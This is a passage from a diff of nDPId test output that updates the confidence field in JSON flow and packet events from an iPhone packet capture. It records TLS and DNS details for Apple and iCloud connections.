{"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cl4.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00983{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598721,"flow_last_seen":1582454599041,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599041,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -03624{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":237,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1582454598721,"flow_last_seen":1582454599054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6277,"flow_avg_l4_payload_len":697,"midstream":0,"thread_ts_msec":1582454599054,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","server_names":"p62-keyvalueservice.icloud.com,p41-keyvalueservice.icloud.com,p97-keyvalueservice.icloud.com,p28-keyvalueservice.icloud.com,p32-keyvalueservice.icloud.com,p56-keyvalueservice.icloud.com,p33-keyvalueservice.icloud.com,p37-keyvalueservice.icloud.com,p67-keyvalueservice.icloud.com,p70-keyvalueservice.icloud.com,p63-keyvalueservice.icloud.com,p07-keyvalueservice.icloud.com,p52-keyvalueservice.icloud.com,p18-keyvalueservice.icloud.com,p21-keyvalueservice.icloud.com,p17-keyvalueservice.icloud.com,p36-keyvalueservice.icloud.com,p19-keyvalueservice.icloud.com,p26-keyvalueservice.icloud.com,p55-keyvalueservice.icloud.com,p06-keyvalueservice.icloud.com,p23-keyvalueservice.icloud.com,p65-keyvalueservice.icloud.com,p58-keyvalueservice.icloud.com,p35-keyvalueservice.icloud.com,p42-keyvalueservice.icloud.com,p12-keyvalueservice.icloud.com,p15-keyvalueservice.icloud.com,p16-keyvalueservice.icloud.com,p29-keyvalueservice.icloud.com,p39-keyvalueservice.icloud.com,p71-keyvalueservice.icloud.com,p22-keyvalueservice.icloud.com,p40-keyvalueservice.icloud.com,p11-keyvalueservice.icloud.com,p66-keyvalueservice.icloud.com,p68-keyvalueservice.icloud.com,p201-keyvalueservice.icloud.com,p10-keyvalueservice.icloud.com,p61-keyvalueservice.icloud.com,p30-keyvalueservice.icloud.com,p01-keyvalueservice.icloud.com,p14-keyvalueservice.icloud.com,p50-keyvalueservice.icloud.com,p31-keyvalueservice.icloud.com,p47-keyvalueservice.icloud.com,p48-keyvalueservice.icloud.com,p20-keyvalueservice.icloud.com,p51-keyvalueservice.icloud.com,p27-keyvalueservice.icloud.com,p49-keyvalueservice.icloud.com,p03-keyvalueservice.icloud.com,p24-keyvalueservice.icloud.com,p25-keyvalueservice.icloud.com,p08-keyvalueservice.icloud.com,p13-keyvalueservice.icloud.com,p04-keyvalueservice.icloud.com,p05-keyvalueservice.icloud.com,p02-keyvalueservice.icloud.com,p09-keyvalueservice.icloud.com,p57-keyvalueservice.icloud.com,p59-keyvalueservice.icloud.com,p64-keyvalueservice.icloud.com,p38-keyvalueservice.icloud.com,p54-keyvalueservice.icloud.com,p72-keyvalueservice.icloud.com,keyvalueservice.icloud.com,p69-keyvalueservice.icloud.com,p43-keyvalueservice.icloud.com,p45-keyvalueservice.icloud.com,p202-keyvalueservice.icloud.com,p98-keyvalueservice.icloud.com,p34-keyvalueservice.icloud.com,p44-keyvalueservice.icloud.com,p46-keyvalueservice.icloud.com,p53-keyvalueservice.icloud.com,p60-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=keyvalueservice.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D8:84:3B:15:06:49:1C:72:C4:05:C0:F0:82:3B:43:4A:D1:8F:D5:9F"}} +00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598888,"flow_last_seen":1582454598934,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598934,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cl4.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598888,"flow_last_seen":1582454598974,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598974,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cl4.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00983{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598721,"flow_last_seen":1582454599041,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599041,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +03624{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":237,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1582454598721,"flow_last_seen":1582454599054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6277,"flow_avg_l4_payload_len":697,"midstream":0,"thread_ts_msec":1582454599054,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","server_names":"p62-keyvalueservice.icloud.com,p41-keyvalueservice.icloud.com,p97-keyvalueservice.icloud.com,p28-keyvalueservice.icloud.com,p32-keyvalueservice.icloud.com,p56-keyvalueservice.icloud.com,p33-keyvalueservice.icloud.com,p37-keyvalueservice.icloud.com,p67-keyvalueservice.icloud.com,p70-keyvalueservice.icloud.com,p63-keyvalueservice.icloud.com,p07-keyvalueservice.icloud.com,p52-keyvalueservice.icloud.com,p18-keyvalueservice.icloud.com,p21-keyvalueservice.icloud.com,p17-keyvalueservice.icloud.com,p36-keyvalueservice.icloud.com,p19-keyvalueservice.icloud.com,p26-keyvalueservice.icloud.com,p55-keyvalueservice.icloud.com,p06-keyvalueservice.icloud.com,p23-keyvalueservice.icloud.com,p65-keyvalueservice.icloud.com,p58-keyvalueservice.icloud.com,p35-keyvalueservice.icloud.com,p42-keyvalueservice.icloud.com,p12-keyvalueservice.icloud.com,p15-keyvalueservice.icloud.com,p16-keyvalueservice.icloud.com,p29-keyvalueservice.icloud.com,p39-keyvalueservice.icloud.com,p71-keyvalueservice.icloud.com,p22-keyvalueservice.icloud.com,p40-keyvalueservice.icloud.com,p11-keyvalueservice.icloud.com,p66-keyvalueservice.icloud.com,p68-keyvalueservice.icloud.com,p201-keyvalueservice.icloud.com,p10-keyvalueservice.icloud.com,p61-keyvalueservice.icloud.com,p30-keyvalueservice.icloud.com,p01-keyvalueservice.icloud.com,p14-keyvalueservice.icloud.com,p50-keyvalueservice.icloud.com,p31-keyvalueservice.icloud.com,p47-keyvalueservice.icloud.com,p48-keyvalueservice.icloud.com,p20-keyvalueservice.icloud.com,p51-keyvalueservice.icloud.com,p27-keyvalueservice.icloud.com,p49-keyvalueservice.icloud.com,p03-keyvalueservice.icloud.com,p24-keyvalueservice.icloud.com,p25-keyvalueservice.icloud.com,p08-keyvalueservice.icloud.com,p13-keyvalueservice.icloud.com,p04-keyvalueservice.icloud.com,p05-keyvalueservice.icloud.com,p02-keyvalueservice.icloud.com,p09-keyvalueservice.icloud.com,p57-keyvalueservice.icloud.com,p59-keyvalueservice.icloud.com,p64-keyvalueservice.icloud.com,p38-keyvalueservice.icloud.com,p54-keyvalueservice.icloud.com,p72-keyvalueservice.icloud.com,keyvalueservice.icloud.com,p69-keyvalueservice.icloud.com,p43-keyvalueservice.icloud.com,p45-keyvalueservice.icloud.com,p202-keyvalueservice.icloud.com,p98-keyvalueservice.icloud.com,p34-keyvalueservice.icloud.com,p44-keyvalueservice.icloud.com,p46-keyvalueservice.icloud.com,p53-keyvalueservice.icloud.com,p60-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=keyvalueservice.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D8:84:3B:15:06:49:1C:72:C4:05:C0:F0:82:3B:43:4A:D1:8F:D5:9F"}} 00541{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":238,"source":"iphone.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599054,"flow_last_seen":1582454599054,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454599054,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"iphone.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1582454599054,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1582454599054,"pkt":"AQBeAAAWxGGLNYKpCABGAAAoAABAAAECQgDAqAIR4AAAFpQEAAAiAPkCAAAAAQQAAADgAAD7"} -00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"iphone.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599054,"flow_last_seen":1582454599054,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454599054,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"iphone.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599054,"flow_last_seen":1582454599054,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454599054,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":246,"source":"iphone.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599065,"flow_last_seen":1582454599065,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1582454599065,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62160,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"iphone.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1582454599065,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1582454599065,"pkt":"xiwDYGpkxGGLNYKpCABFAAA7Z5IAAP8RzrzAqAIRwKgCAfLQADUAJ+lbzwoBAAABAAAAAAAAA2dzYQVhcHBsZQNjb20AAAEAAQ=="} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"iphone.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599065,"flow_last_seen":1582454599065,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1582454599065,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62160,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsa.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"iphone.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599065,"flow_last_seen":1582454599065,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1582454599065,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62160,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsa.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599073,"flow_last_seen":1582454599073,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1582454599073,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52031,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1582454599073,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1582454599073,"pkt":"xiwDYGpkxGGLNYKpCABFAAA7y\/EAAP8Ral3AqAIRwKgCAcs\/ADUAJ2vSdCUBAAABAAAAAAAAA2dzYQVhcHBsZQNjb20AAAEAAQ=="} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599073,"flow_last_seen":1582454599073,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1582454599073,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52031,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsa.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599073,"flow_last_seen":1582454599073,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1582454599073,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52031,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsa.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"iphone.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1582454599105,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":127,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":127,"pkt_l4_len":93,"thread_ts_msec":1582454599105,"pkt":"xGGLNYKpxiwDYGpkCABFAABxJf8AAEARzxrAqAIBwKgCEQA18tAAXXwrzwqBgAABAAIAAAAAA2dzYQVhcHBsZQNjb20AAAEAAcAMAAUAAQAAEZYAGgNnc2EFYXBwbGUDY29tBmFrYWRucwNuZXQAwCsAAQABAAAA4QAEEYmmIw=="} -00775{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"iphone.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454599065,"flow_last_seen":1582454599105,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1582454599105,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62160,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsa.apple.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.137.166.35"}} +00775{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"iphone.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454599065,"flow_last_seen":1582454599105,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1582454599105,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62160,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsa.apple.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.137.166.35"}} 00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1582454599105,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":127,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":127,"pkt_l4_len":93,"thread_ts_msec":1582454599105,"pkt":"xGGLNYKpxiwDYGpkCABFAABx6W4AAEARC6vAqAIBwKgCEQA1yz8AXf6hdCWBgAABAAIAAAAAA2dzYQVhcHBsZQNjb20AAAEAAcAMAAUAAQAAEZYAGgNnc2EFYXBwbGUDY29tBmFrYWRucwNuZXQAwCsAAQABAAAA4QAEEYmmIw=="} -00775{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":261,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454599073,"flow_last_seen":1582454599105,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1582454599105,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52031,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsa.apple.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.137.166.35"}} +00775{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":261,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454599073,"flow_last_seen":1582454599105,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1582454599105,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52031,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsa.apple.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.137.166.35"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599225,"flow_last_seen":1582454599225,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599225,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1582454599225,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599225,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGtbvAqAIREfiwS8WYAbuypew6AAAAALDC\/\/9PDwAAAgQFtAEDAwcBAQgKEd\/qGwAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1582454599259,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599259,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAC4GB8AR+LBLwKgCEQG7xZj0WnUXsqXsO6BScSAj8wAAAgQFrAEBCApbEwn1Ed\/qGwEDAwU="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1582454599261,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454599261,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGtcfAqAIREfiwS8WYAbuypew79Fp1GIAQBAu8hwAAAQEIChHf6p1bEwn1"} -00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599225,"flow_last_seen":1582454599261,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454599261,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":270,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599225,"flow_last_seen":1582454599295,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599295,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 